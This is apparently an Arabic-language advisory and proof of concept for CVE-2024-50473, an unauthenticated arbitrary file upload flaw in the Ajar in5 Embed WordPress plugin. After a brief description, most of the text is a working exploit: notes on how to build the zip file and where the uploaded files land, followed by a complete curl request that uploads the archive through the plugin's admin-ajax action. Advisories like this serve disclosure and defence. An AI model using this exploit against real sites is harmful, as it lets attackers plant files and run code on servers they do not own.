
Ajar in5 Embed <= 3.1.3 - رفع ملفات تعسفي بدون مصادقة
Ajar in5 Embed <= 3.1.3 - رفع ملفات اعتباطي غير مصادق عليه
إضافة Ajar in5 Embed لـ WordPress معرضة لرفع ملفات عشوائية بسبب غياب التحقق من نوع الملف في جميع الإصدارات حتى 3.1.3. وهذا يتيح للمهاجمين غير المصادقين رفع ملفات عشوائية على خادم الموقع المتأثر، مما قد يجعل تنفيذ التعليمات البرمجية عن بُعد ممكنًا.
Published: 2024-10-25 00:00:00
CVE: CVE-2024-50473
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: ajar-productions-in5-embed
ملاحظة: يجب أن يحتوي ملف الضغط (Zip) على ملف index.html حتى لو كان فارغًا، وستحصل على خطأ 500 وهذا أمر طبيعي.
ستجد الملفات المرفوعة في /wp-content/uploads/2024/php5/ - وphp5 هو اسم ملف الضغط بدون الامتداد.
curl -X POST "http://kubernetes.docker.internal/wp-admin/admin-ajax.php?action=in5&in5=upload" \
-H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0" \
-H "Accept: application/json, text/javascript, */*; q=0.01" \
-H "Accept-Language: en-US,en;q=0.5" \
-H "Accept-Encoding: gzip, deflate, br" \
-H "Referer: http://kubernetes.docker.internal/wp-admin/post.php?post=4142&action=edit" \
-H "X-Requested-With: XMLHttpRequest" \
-H "Content-Type: multipart/form-data" \
-F "customPath=wp-content/uploads/2024/" \
-F "files[]=@/path/to/php5.zip" \
--compressed